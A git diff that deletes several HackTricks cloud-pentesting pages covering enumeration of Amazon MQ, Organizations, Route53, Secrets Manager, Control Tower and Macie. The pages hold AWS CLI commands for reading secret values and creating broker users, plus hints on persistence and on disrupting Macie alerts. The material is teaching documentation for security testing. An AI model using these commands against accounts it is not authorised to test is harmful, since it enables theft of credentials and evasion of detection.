- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Amazon MQ - -### Introduction to Message Brokers - -**Message brokers** serve as intermediaries, facilitating communication between different software systems, which may be built on varied platforms and programmed in different languages. **Amazon MQ** simplifies the deployment, operation, and maintenance of message brokers on AWS. It provides managed services for **Apache ActiveMQ** and **RabbitMQ**, ensuring seamless provisioning and automatic software version updates. - -### AWS - RabbitMQ - -RabbitMQ is a prominent **message-queueing software**, also known as a _message broker_ or _queue manager_. It's fundamentally a system where queues are configured. Applications interface with these queues to **send and receive messages**. Messages in this context can carry a variety of information, ranging from commands to initiate processes on other applications (potentially on different servers) to simple text messages. The messages are held by the queue-manager software until they are retrieved and processed by a receiving application. AWS provides an easy-to-use solution for hosting and managing RabbitMQ servers. - -### AWS - ActiveMQ - -Apache ActiveMQ® is a leading open-source, Java-based **message broker** known for its versatility. It supports multiple industry-standard protocols, offering extensive client compatibility across a wide array of languages and platforms. Users can: - -* Connect with clients written in JavaScript, C, C++, Python, .Net, and more. -* Leverage the **AMQP** protocol to integrate applications from different platforms. -* Use **STOMP** over websockets for web application message exchanges. -* Manage IoT devices with **MQTT**. -* Maintain existing **JMS** infrastructure and extend its capabilities. - -ActiveMQ's robustness and flexibility make it suitable for a multitude of messaging requirements. - -## Enumeration - -```bash -# List brokers -aws mq list-brokers - -# Get broker info -aws mq describe-broker --broker-id -## Find endpoints in .BrokerInstances -## Find if public accessible in .PubliclyAccessible - -# List usernames (only for ActiveMQ) -aws mq list-users --broker-id - -# Get user info (PASSWORD NOT INCLUDED) -aws mq describe-user --broker-id --username - -# Lits configurations (only for ActiveMQ) -aws mq list-configurations -## Here you can find if simple or LDAP authentication is used - -# Creacte Active MQ user -aws mq create-user --broker-id --password --username --console-access -``` - -{% hint style="warning" %} -TODO: Indicate how to enumerate RabbitMQ and ActiveMQ internally and how to listen in all queues and send data (send PR if you know how to do this) -{% endhint %} - -## Privesc - -{% content-ref url="../aws-privilege-escalation/aws-mq-privesc.md" %} -[aws-mq-privesc.md](../aws-privilege-escalation/aws-mq-privesc.md) -{% endcontent-ref %} - -## Unauthenticated Access - -{% content-ref url="../aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md" %} -[aws-mq-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md) -{% endcontent-ref %} - -## Persistence - -If you know the credentials to access the RabbitMQ web console, you can create a new user qith admin privileges. - -## References - -* [https://www.cloudamqp.com/blog/part1-rabbitmq-for-beginners-what-is-rabbitmq.html](https://www.cloudamqp.com/blog/part1-rabbitmq-for-beginners-what-is-rabbitmq.html) -* [https://activemq.apache.org/](https://activemq.apache.org/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md b/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md deleted file mode 100644 index 06598159d..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md +++ /dev/null @@ -1,73 +0,0 @@ -# AWS - Organizations Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Baisc Information - -AWS Organizations facilitates the creation of new AWS accounts without incurring additional costs. Resources can be allocated effortlessly, accounts can be efficiently grouped, and governance policies can be applied to individual accounts or groups, enhancing management and control within the organization. - -Key Points: - -* **New Account Creation**: AWS Organizations allows the creation of new AWS accounts without extra charges. -* **Resource Allocation**: It simplifies the process of allocating resources across the accounts. -* **Account Grouping**: Accounts can be grouped together, making management more streamlined. -* **Governance Policies**: Policies can be applied to accounts or groups of accounts, ensuring compliance and governance across the organization. - -You can find more information in: - -{% content-ref url="../aws-basic-information/" %} -[aws-basic-information](../aws-basic-information/) -{% endcontent-ref %} - -```bash -# Get Org -aws organizations describe-organization -aws organizations list-roots - -# Get OUs, from root and from other OUs -aws organizations list-organizational-units-for-parent --parent-id r-lalala -aws organizations list-organizational-units-for-parent --parent-id ou-n8s9-8nzv3a5y - -# Get accounts -## List all the accounts without caring about the parent -aws organizations list-accounts -## Accounts from a parent -aws organizations list-accounts-for-parent --parent-id r-lalala -aws organizations list-accounts-for-parent --parent-id ou-n8s9-8nzv3a5y - -# Get basic account info -## You need the permission iam:GetAccountSummary -aws iam get-account-summary -``` - -## References - -* https://aws.amazon.com/organizations/ - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md b/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md deleted file mode 100644 index 13db530f0..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md +++ /dev/null @@ -1,50 +0,0 @@ -# AWS - Other Services Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Directconnect - -Allows to **connect a corporate private network with AWS** (so you could compromise an EC2 instance and access the corporate network). - -``` -aws directconnect describe-connections -aws directconnect describe-interconnects -aws directconnect describe-virtual-gateways -aws directconnect describe-virtual-interfaces -``` - -## Support - -In AWS you can access current and previous support cases via the API - -``` -aws support describe-cases --include-resolved-cases -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md b/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md deleted file mode 100644 index 96cc1cdee..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md +++ /dev/null @@ -1,57 +0,0 @@ -# AWS - Route53 Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Route 53 - -Amazon Route 53 is a cloud **Domain Name System (DNS)** web service.\ -You can create https, http and tcp **health checks for web pages** via Route53. - -### IP-based routing - -This is useful to tune your DNS routing to make the best DNS routing decisions for your end users.\ -IP-based routing offers you the additional ability to **optimize routing based on specific knowledge of your customer base**. - -### Enumeration - -```bash -aws route53 list-hosted-zones # Get domains -aws route53 get-hosted-zone --id -aws route53 list-resource-record-sets --hosted-zone-id # Get all records -aws route53 list-health-checks -aws route53 list-traffic-policies -``` - -### Privesc - -{% content-ref url="../aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md" %} -[route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md](../aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md b/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md deleted file mode 100644 index 95d71ffd1..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md +++ /dev/null @@ -1,76 +0,0 @@ -# AWS - Secrets Manager Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## AWS Secrets Manager - -AWS Secrets Manager is designed to **eliminate the use of hard-coded secrets in applications by replacing them with an API call**. This service serves as a **centralized repository for all your secrets**, ensuring they are managed uniformly across all applications. - -The manager simplifies the **process of rotating secrets**, significantly improving the security posture of sensitive data like database credentials. Additionally, secrets like API keys can be automatically rotated with the integration of lambda functions. - -The access to secrets is tightly controlled through detailed IAM identity-based policies and resource-based policies. - -For granting access to secrets to a user from a different AWS account, it's necessary to: - -1. Authorize the user to access the secret. -2. Grant permission to the user to decrypt the secret using KMS. -3. Modify the Key policy to allow the external user to utilize it. - -**AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.** - -### **Enumeration** - -```bash -aws secretsmanager list-secrets #Get metadata of all secrets -aws secretsmanager list-secret-version-ids --secret-id # Get versions -aws secretsmanager describe-secret --secret-id # Get metadata -aws secretsmanager get-secret-value --secret-id # Get value -aws secretsmanager get-secret-value --secret-id --version-id # Get value of a different version -aws secretsmanager get-resource-policy --secret-id --secret-id -``` - -### Privesc - -{% content-ref url="../aws-privilege-escalation/aws-secrets-manager-privesc.md" %} -[aws-secrets-manager-privesc.md](../aws-privilege-escalation/aws-secrets-manager-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-secrets-manager-post-exploitation.md" %} -[aws-secrets-manager-post-exploitation.md](../aws-post-exploitation/aws-secrets-manager-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../aws-persistence/aws-secrets-manager-persistence.md" %} -[aws-secrets-manager-persistence.md](../aws-persistence/aws-secrets-manager-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md deleted file mode 100644 index 203439dda..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md +++ /dev/null @@ -1,72 +0,0 @@ -# AWS - Control Tower Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Control Tower - -{% hint style="info" %} -In summary, Control Tower is a service that allows to define policies for all your accounts inside your org. So instead of managing each of the you can set policies from COntrol Tower that will be applied on them. -{% endhint %} - -AWS Control Tower is a **service provided by Amazon Web Services (AWS)** that enables organizations to set up and govern a secure, compliant, multi-account environment in AWS. - -AWS Control Tower provides a **pre-defined set of best-practice blueprints** that can be customized to meet specific **organizational requirements**. These blueprints include pre-configured AWS services and features, such as AWS Single Sign-On (SSO), AWS Config, AWS CloudTrail, and AWS Service Catalog. - -With AWS Control Tower, administrators can quickly set up a **multi-account environment that meets organizational requirements**, such as **security** and compliance. The service provides a central dashboard to view and manage accounts and resources, and it also automates the provisioning of accounts, services, and policies. - -In addition, AWS Control Tower provides guardrails, which are a set of pre-configured policies that ensure the environment remains compliant with organizational requirements. These policies can be customized to meet specific needs. - -Overall, AWS Control Tower simplifies the process of setting up and managing a secure, compliant, multi-account environment in AWS, making it easier for organizations to focus on their core business objectives. - -### Enumeration - -For enumerating controltower controls, you first need to **have enumerated the org**: - -{% content-ref url="../aws-organizations-enum.md" %} -[aws-organizations-enum.md](../aws-organizations-enum.md) -{% endcontent-ref %} - -{% code overflow="wrap" %} -```bash -# Get controls applied in an account -aws controltower list-enabled-controls --target-identifier arn:aws:organizations:::ou/ -``` -{% endcode %} - -{% hint style="warning" %} -Control Tower can also use **Account factory** to execute **CloudFormation templates** in **accounts and run services** (privesc, post-exploitation...) in those accounts -{% endhint %} - -### Post Exploitation & Persistence - -{% content-ref url="../../aws-post-exploitation/aws-control-tower-post-exploitation.md" %} -[aws-control-tower-post-exploitation.md](../../aws-post-exploitation/aws-control-tower-post-exploitation.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md deleted file mode 100644 index 588e24ab1..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md +++ /dev/null @@ -1,41 +0,0 @@ -# AWS - Cost Explorer Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cost Explorer and Anomaly detection - -This allows you to check **how are you expending money in AWS services** and help you **detecting anomalies**.\ -Moreover, you can configure an anomaly detection so AWS will warn you when some a**nomaly in costs is found**. - -### Budgets - -Budgets help to **manage costs and usage**. You can get **alerted when a threshold is reached**.\ -Also, they can be used for non cost related monitoring like the usage of a service (how many GB are used in a particular S3 bucket?). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md deleted file mode 100644 index 35ff808ba..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md +++ /dev/null @@ -1,42 +0,0 @@ -# AWS - Detective Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Detective - -**Amazon Detective** streamlines the security investigation process, making it more efficient to **analyze, investigate, and pinpoint the root cause** of security issues or unusual activities. It automates the collection of log data from AWS resources and employs **machine learning, statistical analysis, and graph theory** to construct an interconnected data set. This setup greatly enhances the speed and effectiveness of security investigations. - -The service eases in-depth exploration of security incidents, allowing security teams to swiftly understand and address the underlying causes of issues. Amazon Detective analyzes vast amounts of data from sources like VPC Flow Logs, AWS CloudTrail, and Amazon GuardDuty. It automatically generates a **comprehensive, interactive view of resources, users, and their interactions over time**. This integrated perspective provides all necessary details and context in one location, enabling teams to discern the reasons behind security findings, examine pertinent historical activities, and rapidly determine the root cause. - -## References - -* [https://aws.amazon.com/detective/](https://aws.amazon.com/detective/) -* [https://cloudsecdocs.com/aws/services/logging/other/#detective](https://cloudsecdocs.com/aws/services/logging/other/#detective) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md deleted file mode 100644 index 6667dcf6b..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md +++ /dev/null @@ -1,145 +0,0 @@ -# AWS - Macie Enum - -## AWS - Macie Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Macie - -Amazon Macie stands out as a service designed to **automatically detect, classify, and identify data** within an AWS account. It leverages **machine learning** to continuously monitor and analyze data, primarily focusing on detecting and alerting against unusual or suspicious activities by examining **cloud trail event** data and user behavior patterns. - -Key Features of Amazon Macie: - -1. **Active Data Review**: Employs machine learning to review data actively as various actions occur within the AWS account. -2. **Anomaly Detection**: Identifies irregular activities or access patterns, generating alerts to mitigate potential data exposure risks. -3. **Continuous Monitoring**: Automatically monitors and detects new data in Amazon S3, employing machine learning and artificial intelligence to adapt to data access patterns over time. -4. **Data Classification with NLP**: Utilizes natural language processing (NLP) to classify and interpret different data types, assigning risk scores to prioritize findings. -5. **Security Monitoring**: Identifies security-sensitive data, including API keys, secret keys, and personal information, helping to prevent data leaks. - -Amazon Macie is a **regional service** and requires the 'AWSMacieServiceCustomerSetupRole' IAM Role and an enabled AWS CloudTrail for functionality. - -### Alert System - -Macie categorizes alerts into predefined categories like: - -* Anonymized access -* Data compliance -* Credential Loss -* Privilege escalation -* Ransomware -* Suspicious access, etc. - -These alerts provide detailed descriptions and result breakdowns for effective response and resolution. - -### Dashboard Features - -The dashboard categorizes data into various sections, including: - -* S3 Objects (by time range, ACL, PII) -* High-risk CloudTrail events/users -* Activity Locations -* CloudTrail user identity types, and more. - -### User Categorization - -Users are classified into tiers based on the risk level of their API calls: - -* **Platinum**: High-risk API calls, often with admin privileges. -* **Gold**: Infrastructure-related API calls. -* **Silver**: Medium-risk API calls. -* **Bronze**: Low-risk API calls. - -### Identity Types - -Identity types include Root, IAM user, Assumed Role, Federated User, AWS Account, and AWS Service, indicating the source of requests. - -### Data Classification - -Data classification encompasses: - -* Content-Type: Based on detected content type. -* File Extension: Based on file extension. -* Theme: Categorized by keywords within files. -* Regex: Categorized based on specific regex patterns. - -The highest risk among these categories determines the file's final risk level. - -### Research and Analysis - -Amazon Macie's research function allows for custom queries across all Macie data for in-depth analysis. Filters include CloudTrail Data, S3 Bucket properties, and S3 Objects. Moreover, it supports inviting other accounts to share Amazon Macie, facilitating collaborative data management and security monitoring. - -### Enumeration - -``` -# Get buckets -aws macie2 describe-buckets - -# Org config -aws macie2 describe-organization-configuration - -# Get admin account (if any) -aws macie2 get-administrator-account -aws macie2 list-organization-admin-accounts # Run from the management account of the org - -# Get macie account members (run this form the admin account) -aws macie2 list-members - -# Check if automated sensitive data discovey is enabled -aws macie2 get-automated-discovery-configuration - -# Get findings -aws macie2 list-findings -aws macie2 get-findings --finding-ids -aws macie2 list-findings-filters -aws macie2 get -findings-filters --id - -# Get allow lists -aws macie2 list-allow-lists -aws macie2 get-allow-list --id - -# Get different info -aws macie2 list-classification-jobs -aws macie2 list-classification-scopes -aws macie2 list-custom-data-identifiers -``` - -#### Post Exploitation - -{% hint style="success" %} -From an attackers perspective, this service isn't made to detect the attacker, but to detect sensitive information in the stored files. Therefore, this service might **help an attacker to find sensitive info** inside the buckets.\ -However, maybe an attacker could also be interested in disrupting it in order to prevent the victim from getting alerts and steal that info easier. -{% endhint %} - -TODO: PRs are welcome! - -## References - -* [https://cloudacademy.com/blog/introducing-aws-security-hub/](https://cloudacademy.com/blog/introducing-aws-security-hub/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
